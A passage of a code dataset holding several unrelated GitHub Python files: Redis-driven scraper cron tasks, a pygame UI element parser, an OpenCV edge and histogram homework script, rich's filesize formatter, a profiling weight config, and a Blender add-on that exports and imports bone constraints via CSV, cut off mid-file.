for did in arr:\n # checkdiary(did.decode())\n #time.sleep(0.01)\n con.zrem('diary_list', *arr)\n print('aftersleep')\n\n\ndef task_checkuser():\n con = get_redis_connection('default')\n beforecheck(sys._getframe().f_code.co_name)\n while 1:\n arr=con.zrange('user_list',0,3)\n print('arrL',arr)\n ath=[threading.Thread(target=checkuser,args=(did.decode(),)) for did in arr]\n [th.start() for th in ath]\n [th.join() for th in ath]\n # for did in arr:\n # tmp=checkuser(did.decode())\n #time.sleep(0.01)\n con.zrem('user_list',*arr)\n print('aftersleep')\n\ndef task_checkproduct():\n con = get_redis_connection('default')\n beforecheck(sys._getframe().f_code.co_name)\n while 1:\n arr=con.zrange('product_list',0,3)\n ath=[threading.Thread(target=checkproduct,args=(did.decode(),)) for did in arr]\n [th.start() for th in ath]\n [th.join() for th in ath]\n # for did in arr:\n # tmp=checkproduct(did.decode())\n #time.sleep(0.01)\n con.zrem('product_list', *arr)\n print('aftersleep')\n\ndef task_checkhospital():\n con = get_redis_connection('default')\n beforecheck(sys._getframe().f_code.co_name)\n while 1:\n arr=con.zrange('hospital_list',0,3)\n ath=[threading.Thread(target=checkhospital,args=(did.decode(),)) for did in arr]\n [th.start() for th in ath]\n [th.join() for th in ath]\n # for did in arr:\n # checkhospital(did.decode())\n #time.sleep(0.01)\n con.zrem('hospital_list', *arr)\n print('aftersleep')\nfrom grab.checkuser import checkuserflow,checkuserfans\ndef task_checkdoctor():\n con = get_redis_connection('default')\n beforecheck(sys._getframe().f_code.co_name)\n while 1:\n arr=con.zrange('doctor_list',0,3)\n ath=[threading.Thread(target=checkdoctor,args=(did.decode(),)) for did in arr]\n [th.start() for th in ath]\n [th.join() for th in ath]\n # for did in arr:\n # checkdoctor(did.decode())\n #time.sleep(0.01)\n con.zrem('doctor_list', *arr)\n print('aftersleep')\n\n\n#164361819\nif __name__=='__main__':\n 
task_checkuser()","repo_name":"fengchuan1021/soyoung","sub_path":"grab/cron_task.py","file_name":"cron_task.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"18021755369","text":"# ui_dict = {\n# textobj_list = []\n# tile_list = [\n# tile = {\n# animations = {\n# state_default =\n# state_mdown =\n# }\n# trigger_id =\n# mirrored =\n# flipped\n# width =\n# height =\n# positions = [\n# [x, y]\n# [x, y]\n# ...\n# ]\n# }\n# ...\n# ]\n#\n# trigger_map = [\n# trigger_id = {\n# trigger_id =\n# top = [x, y]\n# left = [x, y]\n# bottom = [x, y]\n# right = [x, y]\n# state =\n# key_code =\n# }\n# ]\n# sound_set = {\n# sound = {\n# sound_name\n# trigger_id = {\n# states = []\n# }\n# }\n# }\n# }\n\nimport pygame\nfrom class_UIText import UIText\n\n\nclass UIElement:\n\n def __init__(self, gameboard, ui_name):\n # Initialize attributes to represent the character.\n\n self.gameboard = gameboard\n self.image = None\n self.screen = self.gameboard.screen\n\n self.mousefollow = 0\n self.stick_hor = -1\n self.stick_ver = -1\n self.offset_x = 0\n self.offset_y = 0\n\n self.textlayer_list = []\n self.uielement = self.load_uielement(ui_name)\n self.active = True\n self.x = 0\n self.y = 0\n\n def load_uielement(self, ui_name):\n textobj_list = []\n dyn_textobj_dict = {}\n trigger_map = {}\n tile_list = []\n tr_tile_dict = {}\n sound_list = {}\n\n uielement_list = self.gameboard.resources.read_file(self.gameboard.resources.uielements[ui_name])\n\n u = 0\n while u < len(uielement_list):\n if len(uielement_list[u]) > 0 and uielement_list[u][0] != '#':\n element_name, element_content = uielement_list[u].split(\"=\")\n if element_name == 'alignment':\n content_list = element_content.split()\n self.mousefollow, self.stick_hor, self.stick_ver, self.offset_x, self.offset_y = float(\n content_list[0]), float(content_list[1]), float(content_list[2]), float(content_list[3]), float(\n content_list[4])\n if element_name == 'ui_topleft':\n ui_x, ui_y = element_content.split(',')\n self.x, self.y = int(ui_x), int(ui_y)\n if element_name == 'text':\n new_text = self.create_text(element_content)\n textobj_list.append(new_text)\n elif element_name == 'dyn_text':\n new_text = self.create_dyn_text(element_content)\n dyn_textobj_dict[new_text.text_id] = new_text\n elif element_name == 'trigger':\n trigger_id, new_trigger = self.create_trigger(element_content)\n trigger_map[trigger_id] = new_trigger\n elif element_name == 'tr_tile':\n content_list = element_content.split()\n if len(content_list) == 6:\n anim_number = int(content_list[-1])\n anim_rows = uielement_list[u + 2:u + 2 + anim_number]\n position_list = uielement_list[u + 1].split()\n new_tr_tile = self.create_tr_tile(content_list[:5], position_list, anim_rows)\n tr_tile_dict[new_tr_tile['trigger_id']] = new_tr_tile\n u += (2 + anim_number)\n elif element_name == 'tile':\n content_list = element_content.split()\n if len(content_list) == 4:\n position_list = uielement_list[u + 1].split()\n new_tile = self.create_tile(content_list[:4], position_list, uielement_list[u + 2])\n tile_list.append(new_tile)\n u += 2\n elif element_name == 'sound':\n element_list = element_content.split()\n sound_list[element_list[0]] = element_list[1]\n u += 1\n uielement_dict = {\n 'textobj_list': textobj_list,\n 'dyn_textobj_dict': dyn_textobj_dict,\n 'trigger_map': trigger_map,\n 'tr_tile_dict': tr_tile_dict,\n 'tile_list': tile_list,\n 'sound_list': sound_list\n }\n return uielement_dict\n\n def create_text(self, text_content):\n if len(text_content) < 12:\n return False\n x, y, font, size, color, bg_color, h_align, v_align, max_width, max_height, timer, mov_x, mov_y, caption = text_content.split()\n x = float(x)\n y = float(y)\n font = 
font\n size = float(size)\n r, g, b = color.split(',')\n color = (int(r), int(g), int(b))\n r, g, b = bg_color.split(',')\n bg_color = (int(r), int(g), int(b))\n h_align = h_align\n v_align = v_align\n max_width = float(max_width)\n max_height = float(max_height)\n timer = int(timer)\n mov_x = int(mov_x)\n mov_y = int(mov_y)\n new_text = UIText(self.gameboard, 'no_id', caption, x, y, font, size, color, bg_color, h_align, v_align, max_width, max_height, timer, mov_x, mov_y)\n return new_text\n\n def create_dyn_text(self, text_content):\n if len(text_content) < 12:\n return False\n text_id, x, y, font, size, color, bg_color, h_align, v_align, max_width, max_height, timer, mov_x, mov_y = text_content.split()\n x = float(x)\n y = float(y)\n font = font\n size = float(size)\n r, g, b = color.split(',')\n color = (int(r), int(g), int(b))\n r, g, b = bg_color.split(',')\n bg_color = (int(r), int(g), int(b))\n h_align = h_align\n v_align = v_align\n max_width = float(max_width)\n max_height = float(max_height)\n timer = int(timer)\n mov_x = int(mov_x)\n mov_y = int(mov_y)\n new_text = UIText(self.gameboard, text_id, '', x, y, font, size, color, bg_color, h_align, v_align, max_width, max_height, timer, mov_x, mov_y)\n return new_text\n\n def create_trigger(self, trigger_content):\n trigger_id, rect, key_code = trigger_content.split()\n if len(trigger_content) < 3:\n return False\n top, left, bottom, right = rect.split(',')\n trigger_dict = {\n # 'trigger_id': trigger_id,\n 'top': float(top),\n 'left': float(left),\n 'bottom': float(bottom),\n 'right': float(right),\n 'state': 'default',\n 'key_code': int(key_code)\n }\n return trigger_id, trigger_dict\n\n def create_tr_tile(self, content_list, position_list, anim_rows):\n trigger_id, mirrored, flipped, width, height = content_list\n tile_dict = {\n 'trigger_id': trigger_id,\n 'mirrored': int(mirrored),\n 'flipped': int(flipped),\n 'width': float(width),\n 'height': float(height),\n 'positions': [],\n 'animations': {}\n }\n for position in position_list:\n pos_xy = position.split(',')\n print(pos_xy)\n pos_x = float(pos_xy[0])\n pos_y = float(pos_xy[1])\n tile_dict['positions'].append([pos_x, pos_y])\n for anim_row in anim_rows:\n state, anim = anim_row.split('=')\n tile_dict['animations'][state] = self.gameboard.resources.animations[anim]\n return tile_dict\n\n def create_tile(self, content_list, position_list, anim_row):\n mirrored, flipped, width, height = content_list\n tile_dict = {\n 'mirrored': int(mirrored),\n 'flipped': int(flipped),\n 'width': float(width),\n 'height': float(height),\n 'positions': [],\n 'animation': self.gameboard.resources.animations[anim_row]\n }\n for position in position_list:\n pos_xy = position.split(',')\n print(pos_xy)\n pos_x = float(pos_xy[0])\n pos_y = float(pos_xy[1])\n tile_dict['positions'].append([pos_x, pos_y])\n return tile_dict\n\n def blitme(self):\n if self.mousefollow:\n self.x, self.y = self.gameboard.mouse_x + self.offset_x * self.gameboard.square_width, self.gameboard.mouse_y + self.offset_y * self.gameboard.square_height\n else:\n if self.stick_hor != -1:\n self.x = self.gameboard.sight_width * self.stick_hor + self.offset_x * self.gameboard.square_width\n if self.stick_ver != -1:\n self.y = self.gameboard.sight_height * self.stick_ver + self.offset_y * self.gameboard.square_height\n\n # static tiles\n for tile in self.uielement['tile_list']:\n animation = tile['animation']\n image = animation.frames[animation.frame_index]\n mirrored, flipped = False, False\n if 'mirrored' in tile:\n mirrored = 
tile['mirrored'] # horisontal\n if 'flipped' in tile:\n flipped = tile['flipped'] # vertical\n image = pygame.transform.flip(image, mirrored, flipped)\n rect = image.get_rect()\n for x, y in tile['positions']:\n rect.topleft = round(x * self.gameboard.square_width + self.x), round(y * self.gameboard.square_height + self.y)\n # print(rect.topleft, self.gameboard.player_char.x, self.gameboard.player_char.y)\n self.screen.blit(pygame.transform.scale(image, (\n round(tile['width'] * self.gameboard.square_width),\n round(tile['height'] * self.gameboard.square_height))), rect)\n\n # trigger tiles\n for tr_id, tr_tile in self.uielement['tr_tile_dict'].items():\n anim_state = self.uielement['trigger_map'][tr_id]['state']\n if anim_state not in tr_tile['animations']:\n anim_state = 'default'\n animation = tr_tile['animations'][anim_state]\n animation.checkme()\n image = animation.frames[animation.frame_index]\n\n mirrored, flipped = False, False\n if 'mirrored' in tr_tile:\n mirrored = tr_tile['mirrored'] # horisontal\n if 'flipped' in tr_tile:\n flipped = tr_tile['flipped'] # vertical\n image = pygame.transform.flip(image, mirrored, flipped)\n rect = image.get_rect()\n\n for x, y in tr_tile['positions']:\n rect.topleft = round(x * self.gameboard.square_width + self.x), round(y * self.gameboard.square_height + self.y)\n # print(rect.topleft, self.gameboard.player_char.x, self.gameboard.player_char.y)\n self.screen.blit(pygame.transform.scale(image, (\n round(tr_tile['width'] * self.gameboard.square_width),\n round(tr_tile['height'] * self.gameboard.square_height))), rect)\n\n for text in self.uielement['textobj_list']:\n if text.visible:\n text.blitme(self.x, self.y)\n for text in self.uielement['dyn_textobj_dict'].values():\n if text.visible:\n text.blitme(self.x, self.y)\n","repo_name":"Sprottenfraulein/IHHAB","sub_path":"class_UIElement.py","file_name":"class_UIElement.py","file_ext":"py","file_size_in_byte":11474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
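The `blitme()` method above repeats a flip-then-scale-then-blit pattern per tile. Below is a minimal, self-contained sketch of that pattern with invented surface sizes and grid positions standing in for `gameboard.square_width`/`square_height`; it draws to an offscreen surface so no window is required (pygame must still be able to initialise).

```python
import pygame

pygame.init()
canvas = pygame.Surface((320, 240))      # offscreen target; no window needed

tile = pygame.Surface((16, 16))
tile.fill((200, 80, 80))

mirrored, flipped = True, False          # horizontal / vertical flip flags, as in the tile dicts
image = pygame.transform.flip(tile, mirrored, flipped)

square_w, square_h = 32, 32              # stand-ins for gameboard.square_width / square_height
for x, y in [(0.0, 0.0), (2.5, 1.0)]:    # positions in grid units, like the parser emits
    scaled = pygame.transform.scale(image, (round(1.0 * square_w), round(1.0 * square_h)))
    canvas.blit(scaled, (round(x * square_w), round(y * square_h)))

print(canvas.get_at((8, 8)))             # a pixel from the first blitted tile
pygame.quit()
```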
+{"seq_id":"12959595071","text":"import numpy as np\nimport cv2\n\n\ndef get_histograms():\n histograms = np.empty(512)\n bins = np.array(range(512))\n inds = np.digitize((np.array(range(581)) * 0.882), bins) - 1\n for filename in os.listdir('../images/ST2MainHall4'):\n print(filename)\n img = cv2.imread('./images/ST2MainHall4/' + filename, 1).astype(int)\n # apply formula [(r/32) ∗ 64 + (g/32) ∗ 8 + b/32]. Max index is 580\n indices = ((img[:, :, 2] << 1) + (img[:, :, 1] >> 2) + (img[:, :, 0] >> 5)).ravel()\n histogram = np.zeros(512)\n counts = np.bincount(indices)\n # map indices from 0 to 580 into the 512 bins\n for i in range(np.shape(counts)[0]):\n histogram[inds[i]] += counts[i]\n histograms = np.vstack([histograms, histogram])\n return histograms[1:]\n\n\ngray_img = cv2.imread('../images/ST2MainHall4/ST2MainHall4001.jpg', 0)\nimg = cv2.imread('../images/ST2MainHall4/ST2MainHall4001.jpg', 1)\nblues = img[:, :, 0]\ngreens = img[:, :, 1]\nreds = img[:, :, 2]\ngray_edges = cv2.Canny(gray_img, 100, 200) == 0\nblue_edges = cv2.Canny(blues, 100, 200) == 0\nred_edges = cv2.Canny(reds, 100, 200) == 0\ngreen_edges = cv2.Canny(greens, 100, 200) == 0\nsobelX_gray = cv2.Sobel(gray_img,cv2.CV_64F,1,0,ksize=5)\nsobelY_gray = cv2.Sobel(gray_img,cv2.CV_64F,0,1,ksize=5)\nsobelX_blue = cv2.Sobel(blues,cv2.CV_64F,1,0,ksize=5)\nsobelY_blue = cv2.Sobel(blues,cv2.CV_64F,0,1,ksize=5)\nsobelX_red = cv2.Sobel(reds,cv2.CV_64F,1,0,ksize=5)\nsobelY_red = cv2.Sobel(reds,cv2.CV_64F,0,1,ksize=5)\nsobelX_green = cv2.Sobel(greens,cv2.CV_64F,1,0,ksize=5)\nsobelY_green = cv2.Sobel(greens,cv2.CV_64F,0,1,ksize=5)\nsobelX_gray[gray_edges] = 0\nsobelY_gray[gray_edges] = 0\nsobelX_blue[blue_edges] = 0\nsobelY_blue[blue_edges] = 0\nsobelX_red[red_edges] = 0\nsobelY_red[red_edges] = 0\nsobelX_green[green_edges] = 0\nsobelY_green[green_edges] = 0\ncv2.imshow('img', sobelX_gray)\ncv2.imshow('edges', sobelX_gray)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"jchoi34/CS682","sub_path":"jchoi34_hw3.py","file_name":"jchoi34_hw3.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"12680687804","text":"# coding: utf-8\n\"\"\"Functions for reporting filesizes. Borrowed from https://github.com/PyFilesystem/pyfilesystem2\n\nThe functions declared in this module should cover the different\nuse cases needed to generate a string representation of a file size\nusing several different units. Since there are many standards regarding\nfile size units, three different functions have been implemented.\n\nSee Also:\n * `Wikipedia: Binary prefix `_\n\n\"\"\"\n\n__all__ = [\"decimal\"]\n\nfrom typing import Iterable, List, Optional, Tuple\n\n\ndef _to_str(\n size: int,\n suffixes: Iterable[str],\n base: int,\n *,\n precision: Optional[int] = 1,\n separator: Optional[str] = \" \",\n) -> str:\n if size == 1:\n return \"1 byte\"\n elif size < base:\n return \"{:,} bytes\".format(size)\n\n for i, suffix in enumerate(suffixes, 2): # noqa: B007\n unit = base**i\n if size < unit:\n break\n return \"{:,.{precision}f}{separator}{}\".format(\n (base * size / unit),\n suffix,\n precision=precision,\n separator=separator,\n )\n\n\ndef pick_unit_and_suffix(size: int, suffixes: List[str], base: int) -> Tuple[int, str]:\n \"\"\"Pick a suffix and base for the given size.\"\"\"\n for i, suffix in enumerate(suffixes):\n unit = base**i\n if size < unit * base:\n break\n return unit, suffix\n\n\ndef decimal(\n size: int,\n *,\n precision: Optional[int] = 1,\n separator: Optional[str] = \" \",\n) -> str:\n \"\"\"Convert a filesize in to a string (powers of 1000, SI prefixes).\n\n In this convention, ``1000 B = 1 kB``.\n\n This is typically the format used to advertise the storage\n capacity of USB flash drives and the like (*256 MB* meaning\n actually a storage capacity of more than *256 000 000 B*),\n or used by **Mac OS X** since v10.6 to report file sizes.\n\n Arguments:\n int (size): A file size.\n int (precision): The number of decimal places to include (default = 1).\n str (separator): The string to separate the value from the units (default = \" \").\n\n Returns:\n `str`: A string containing a abbreviated file size and units.\n\n Example:\n >>> filesize.decimal(30000)\n '30.0 kB'\n >>> filesize.decimal(30000, precision=2, separator=\"\")\n '30.00kB'\n\n \"\"\"\n return _to_str(\n size,\n (\"kB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\", \"YB\"),\n 1000,\n precision=precision,\n separator=separator,\n )\n","repo_name":"Textualize/rich","sub_path":"rich/filesize.py","file_name":"filesize.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","stars":45508,"dataset":"github-code","pt":"39"}
+{"seq_id":"2711996967","text":"# -*- coding: UTF-8 -*-\n#activeness weight dict used by evaluate_index.py\nactiveness_weight_dict = {'activity_time':0.3, 'activity_geo':0.2, 'statusnum':0.5}\n#importance weight dict\nimportance_weight_dict = {'fansnum':0.3, 'retweeted_num':0.3, 'domain':0.2, 'topic':0.2}\n#topic weight dict\ntopic_weight_dict = {'政治':0.3, '军事':0.15, '社会':0.15, '环境':0.05, \\\n '医药':0.05, '经济':0.05, '交通':0.05, '教育':0.05, \\\n '计算机':0.05, '艺术':0.05, '体育':0.05}\n#domain weight dict\ndomain_weight_dict = {'文化':0.3, '媒体':0.3, '财经':0.1, '教育':0.1, \\\n '科技':0.05, '娱乐':0.05, '时尚':0.05, '体育':0.05}\n","repo_name":"lcwy220/sensitive_user_portrait","sub_path":"sensitive_user_portrait/cron/attribute/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
+{"seq_id":"17917421181","text":"#!BPY\n# -*- coding: UTF-8 -*-\n# sync_bone_constraints\n#\n# Sync Armature's bone's constraints\n# And Sync bone's Inverse Kinematics Settings\n# 2018.06.06 N(Natukikazemizo)\n\nif \"bpy\" in locals():\n import imp\n imp.reload(utils_io_csv)\n imp.reload(bone_constraints)\n imp.reload(common)\nelse:\n from . import utils_io_csv\n from . import bone_constraints\n from . import common\n\nimport bpy\nimport re\n\nclass StringValGroup(bpy.types.PropertyGroup):\n string_val = bpy.props.StringProperty()\n\nbpy.utils.register_class(StringValGroup)\n\nclass MySettings(bpy.types.PropertyGroup):\n\n# emotion = bpy.props.EnumProperty(\n# name = \"Emotion\",\n# description = \"Select emotion of registration destination.\",\n# items = common.emotions\n# )\n\n# overwrite_data = bpy.props.BoolProperty(\n# name = \"Overwrite Data\",\n# description = \"Enable or disable overwriting of data.\",\n# default = True\n# )\n\n csv_file_name = bpy.props.StringProperty(\n name = \"csv_file_name\",\n description = \"CSV file name.\"\n )\n csv_file_directory = bpy.props.StringProperty(subtype=\"FILE_PATH\")\n\n msg_chk = bpy.props.StringProperty()\n msg_icon = bpy.props.StringProperty()\n\n\n msg_x_miller_chk = bpy.props.StringProperty()\n #msg_x_miller_icon = bpy.props.StringProperty()\n\n # リストで選択されているオブジェクトの名前\n #sel_armaturej= bpy.props.StringProperty()\n\n # 選択されている値が格納されるプロパティ\n sel_armature = bpy.props.StringProperty()\n sel_string_val = bpy.props.StringProperty()\n\n # Drop Downリストに表示される値のリスト\n string_val_list = bpy.props.CollectionProperty(type=bpy.types.StringValGroup)\n\n direction = bpy.props.EnumProperty(\n name = \"Direction\",\n description = \"Select constraints copy dilection.\",\n items = common.directions\n )\n\n def init_val_list(self):\n self.string_val_list.clear()\n for obj in bpy.data.objects:\n if obj.type == 'ARMATURE':\n v = self.string_val_list.add()\n v.string_val = obj.name\n v.name = obj.name\n\n def check(self):\n if self.csv_file_name == \"\":\n self.msg_chk = bpy.app.translations.pgettext(\"Select CSV file.\")\n self.msg_icon = \"ERROR\"\n elif self.sel_armature == \"\":\n self.msg_chk = bpy.app.translations.\\\n pgettext(\"Select target Armature.\")\n self.msg_icon = \"ERROR\"\n else:\n self.msg_chk = \"OK\"\n self.msg_icon = \"INFO\"\n\n\n\n # def check_x_miller(self):\n # self.msg_x_miller_chk = \"OK\"\n # self.msg_x_miller_icon = \"INFO\"\n\n# def update_val(self, nm):\n# for sv in self.string_val_list:\n# if sv.name == nm:\n# self.sel_string_val = sv.string_val\n\nclass SelectCSVFile(bpy.types.Operator):\n\n bl_idname = \"object.select_csv_file\"\n bl_label = bpy.app.translations.pgettext(\"Select CSV File\")\n bl_description = bpy.app.translations.pgettext(\"Select CSV File\")\n bl_options = {'REGISTER', 'UNDO'}\n\n filepath = bpy.props.StringProperty(subtype=\"FILE_PATH\")\n filename = bpy.props.StringProperty(name=\"filename\")\n directory = bpy.props.StringProperty(subtype=\"FILE_PATH\")\n # Search Filter\n filter_glob = bpy.props.StringProperty(\n default=\"*.csv\",\n options={'HIDDEN'}\n )\n\n def execute(self, context):\n self.report(\n {'INFO'},\n \" [FilePath] %s, [FileName] %s, [Directory] %s\"\n % (self.filepath, self.filename, self.directory)\n )\n props = context.window_manager.sync_bone_constraints_props\n props.csv_file_directory = self.directory\n props.csv_file_name = self.filename\n return {'FINISHED'}\n\n def invoke(self, context, event):\n wm = context.window_manager\n # Show File Browser\n wm.fileselect_add(self)\n\n return 
{'RUNNING_MODAL'}\n\nclass NullOperation(bpy.types.Operator):\n\n bl_idname = \"object.null_operation\"\n bl_label = \"NOP\"\n bl_description = \"Do nothing\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n return {'FINISHED'}\n\n#class NullOperationMenu(bpy.types.Menu):\n#\n# bl_idname = \"object.null_operation_menu\"\n# bl_label = \"NOP Menu\"\n# bl_description = \"Menu with multiple processes that do nothing\"\n\n# def draw(self, context):\n# layout = self.layout\n# # Add menu items\n# for i in range(3):\n# layout.operator(NullOperation.bl_idname, text=(\"Item %d\" % (i)))\n\nclass SyncBonesIK(bpy.types.Operator):\n\n bl_idname = \"object.sync_bones_ik\"\n bl_label = \"SyncBonesIK\"\n bl_description = \"Sync bones Inverse Kinematics Settings.\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n props = context.window_manager.sync_bone_constraints_props\n\n fromArmature = bpy.context.object.name\n for x in bpy.data.objects[props.sel_armature].pose.bones:\n if x.name in bpy.data.objects[fromArmature].pose.bones:\n fromBone = bpy.data.objects[fromArmature].pose.bones[x.name]\n x.ik_min_x = fromBone.ik_min_x\n x.ik_min_y = fromBone.ik_min_y\n x.ik_min_z = fromBone.ik_min_z\n x.ik_max_x = fromBone.ik_max_x\n x.ik_max_y = fromBone.ik_max_y\n x.ik_max_z = fromBone.ik_max_z\n x.use_ik_limit_x = fromBone.use_ik_limit_x\n x.use_ik_limit_y = fromBone.use_ik_limit_y\n x.use_ik_limit_z = fromBone.use_ik_limit_z\n x.ik_stretch = fromBone.ik_stretch\n x.lock_ik_x = fromBone.lock_ik_x\n x.lock_ik_y = fromBone.lock_ik_y\n x.lock_ik_z = fromBone.lock_ik_z\n\n return {'FINISHED'}\n\n\n# Sync Bone Constraints\nclass SyncBoneConstraints(bpy.types.Operator):\n\n bl_idname = \"object.sync_bone_constraints\"\n bl_label = \"Sync\"\n bl_description = \"Sync bones constraints of Armatures.\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ExportBoneConstraints.execute(ExportBoneConstraints, context)\n ImportBoneConstraints.execute(ImportBoneConstraints, context)\n SyncBonesIK.execute(SyncBonesIK, context)\n return {'FINISHED'}\n\nclass ExportBoneConstraints(bpy.types.Operator):\n\n bl_idname = \"object.export_bone_constraints\"\n bl_label = \"Export\"\n bl_description = \"Export bones constraints to CSV File.\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n bone_data = []\n bone_data.append(bone_constraints.BoneConstraints.header)\n\n for x in bpy.context.selected_pose_bones:\n # SKIP Special Bone\n if x.name == \"Controllers_Root\":\n continue\n\n if len(x.constraints) == 0:\n data = bone_constraints.BoneConstraints()\n data.bone_name = x.name\n bone_data.append(data.row)\n\n for y in x.constraints:\n data = bone_constraints.BoneConstraints()\n if y.type == \"TRANSFORM\":\n print(x.name + \", \" + y.name)\n\n data.bone_name = x.name\n data.constraint_name = y.name\n data.mute = y.mute\n data.target = y.target.name\n data.subtarget_bone_name = y.subtarget\n data.extrapolate = y.use_motion_extrapolate\n data.from_min_x = y.from_min_x\n data.from_max_x = y.from_max_x\n data.from_min_y = y.from_min_y\n data.from_max_y = y.from_max_y\n data.from_min_z = y.from_min_z\n data.from_max_z = y.from_max_z\n data.map_to_x_from = y.map_to_x_from\n data.map_to_y_from = y.map_to_y_from\n data.map_to_z_from = y.map_to_z_from\n data.map_to = y.map_to\n\n if y.map_to == \"LOCATION\":\n data.to_min_x = y.to_min_x\n data.to_max_x = y.to_max_x\n data.to_min_y = y.to_min_y\n data.to_max_y = y.to_max_y\n data.to_min_z = y.to_min_z\n data.to_max_z = y.to_max_z\n 
elif y.map_to == \"ROTATION\":\n data.to_min_x = y.to_min_x_rot\n data.to_max_x = y.to_max_x_rot\n data.to_min_y = y.to_min_y_rot\n data.to_max_y = y.to_max_y_rot\n data.to_min_z = y.to_min_z_rot\n data.to_max_z = y.to_max_z_rot\n else:\n # map_to:SCALE\n data.to_min_x = y.to_min_x_scale\n data.to_max_x = y.to_max_x_scale\n data.to_min_y = y.to_min_y_scale\n data.to_max_y = y.to_max_y_scale\n data.to_min_z = y.to_min_z_scale\n data.to_max_z = y.to_max_z_scale\n\n data.target_space = y.target_space\n data.owner_space = y.owner_space\n data.influence = y.influence\n data.type = y.type\n\n bone_data.append(data.row)\n elif y.type == \"COPY_LOCATION\":\n print(x.name + \", \" + y.name)\n\n data.bone_name = x.name\n data.constraint_name = y.name\n data.mute = y.mute\n data.target = y.target.name\n data.subtarget_bone_name = y.subtarget\n\n data.from_min_x = y.use_x\n data.from_max_x = y.invert_x\n data.from_min_y = y.use_y\n data.from_max_y = y.invert_y\n data.from_min_z = y.use_z\n data.from_max_z = y.invert_z\n\n data.target_space = y.target_space\n data.owner_space = y.owner_space\n data.influence = y.influence\n data.type = y.type\n data.head_tail = y.head_tail\n data.use_offset = y.use_offset\n\n bone_data.append(data.row)\n\n elif y.type == \"COPY_ROTATION\":\n print(x.name + \", \" + y.name)\n\n data.bone_name = x.name\n data.constraint_name = y.name\n data.mute = y.mute\n data.target = y.target.name\n data.subtarget_bone_name = y.subtarget\n\n data.from_min_x = y.use_x\n data.from_max_x = y.invert_x\n data.from_min_y = y.use_y\n data.from_max_y = y.invert_y\n data.from_min_z = y.use_z\n data.from_max_z = y.invert_z\n\n data.target_space = y.target_space\n data.owner_space = y.owner_space\n data.influence = y.influence\n data.type = y.type\n data.use_offset = y.use_offset\n\n bone_data.append(data.row)\n\n elif y.type == \"IK\":\n print(x.name + \", \" + y.name)\n\n data.bone_name = x.name\n data.constraint_name = y.name\n data.mute = y.mute\n data.target = y.target.name\n data.subtarget_bone_name = y.subtarget\n\n data.influence = y.influence\n data.type = y.type\n\n data.pole_target = y.pole_target\n data.pole_subtarget = y.pole_subtarget\n data.pole_angle = y.pole_angle\n data.iterations = y.iterations\n data.chain_count = y.chain_count\n data.use_tail = y.use_tail\n data.use_stretch = y.use_stretch\n data.use_location = y.use_location\n data.weight = y.weight\n data.use_rotation = y.use_rotation\n data.orient_weight = y.orient_weight\n\n bone_data.append(data.row)\n\n\n props = context.window_manager.sync_bone_constraints_props\n utils_io_csv.write(props.csv_file_directory,\n props.csv_file_name,\n bone_data)\n return {'FINISHED'}\n\nclass ImportBoneConstraints(bpy.types.Operator):\n\n bl_idname = \"object.import_bone_constraints\"\n bl_label = \"Import\"\n bl_description = \"Import bones constraints from CSV file.\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n props = context.window_manager.sync_bone_constraints_props\n target = props.sel_armature\n props = context.window_manager.sync_bone_constraints_props\n header, data = utils_io_csv.read(props.csv_file_directory, \\\n props.csv_file_name)\n\n for row in data:\n if bpy.data.objects.find(target) == -1:\n print(\"Object not found. Object name is \" + target)\n break\n\n con = bone_constraints.BoneConstraints(row)\n\n if bpy.data.objects[target].pose.bones.find(con.bone_name) == -1:\n print(\"Bone not found. 
Bone name is \" + con.bone_name)\n break\n bone = bpy.data.objects[target].pose.bones[con.bone_name]\n for x in bone.constraints:\n bone.constraints.remove(x)\n\n for row in data:\n\n con = bone_constraints.BoneConstraints(row)\n\n bone = bpy.data.objects[target].pose.bones[con.bone_name]\n\n if con.constraint_name is None or con.constraint_name == \"\":\n continue\n\n if bone.constraints.find(con.constraint_name) == -1:\n constraint = bone.constraints.new(type=con.type)\n constraint.name = con.constraint_name\n\n constraint = bone.constraints[con.constraint_name]\n\n print(\"bone:\" + bone.name + \" constraint:\" + constraint.name)\n\n constraint.mute = con.mute == \"True\"\n constraint.target = bpy.data.objects[target]\n constraint.subtarget = con.subtarget_bone_name\n\n if con.type == \"TRANSFORM\":\n constraint.use_motion_extrapolate = con.extrapolate == \"True\"\n\n constraint.from_min_x = float(con.from_min_x)\n constraint.from_max_x = float(con.from_max_x)\n constraint.from_min_y = float(con.from_min_y)\n constraint.from_max_y = float(con.from_max_y)\n constraint.from_min_z = float(con.from_min_z)\n constraint.from_max_z = float(con.from_max_z)\n\n constraint.map_to_x_from = con.map_to_x_from\n constraint.map_to_y_from = con.map_to_y_from\n constraint.map_to_z_from = con.map_to_z_from\n constraint.map_to = con.map_to\n if constraint.map_to == \"LOCATION\":\n constraint.to_min_x = float(con.to_min_x)\n constraint.to_max_x = float(con.to_max_x)\n constraint.to_min_y = float(con.to_min_y)\n constraint.to_max_y = float(con.to_max_y)\n constraint.to_min_z = float(con.to_min_z)\n constraint.to_max_z = float(con.to_max_z)\n elif constraint.map_to == \"ROTATION\":\n constraint.to_min_x_rot = float(con.to_min_x)\n constraint.to_max_x_rot = float(con.to_max_x)\n constraint.to_min_y_rot = float(con.to_min_y)\n constraint.to_max_y_rot = float(con.to_max_y)\n constraint.to_min_z_rot = float(con.to_min_z)\n constraint.to_max_z_rot = float(con.to_max_z)\n else:\n # map_to:SCALE\n constraint.to_min_x_scale = float(con.to_min_x)\n constraint.to_max_x_scale = float(con.to_max_x)\n constraint.to_min_y_scale = 